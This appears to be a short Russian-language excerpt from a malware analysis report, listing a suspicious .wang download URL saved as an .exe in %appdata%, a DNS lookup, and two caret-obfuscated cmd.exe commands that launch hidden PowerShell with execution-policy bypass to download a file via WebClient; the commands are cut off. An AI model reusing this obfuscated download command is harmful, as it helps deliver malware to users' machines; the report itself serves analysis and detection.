Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWeRShe^LL.EXe -Ex^ECu^TIO^NP^oLicy ^by^PA^Ss -n^Opr^o^fI^Le^ ^-w^in^DOw^S^t^yle h^IDD^eN^ (^nEW-ObJECt^ ^SYS^T^E^m^.^n^eT.WE^bC^LIenT).dOW^NLOA^Dfi^Le(^'http://transporingsyt...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "poWeRShe^LL.EXe -Ex^ECu^TIO^NP^oLicy ^by^PA^Ss -n^Opr^o^fI^Le^ ^-w^in^DOw^S^t^yle h^IDD^eN^ (^nEW-ObJECt^ ^SYS^T^E^m^.^n^eT.WE^bC^LIenT).dOW^NLOA^Dfi^Le(^'http://transporingsyt...' (со скрытым окном)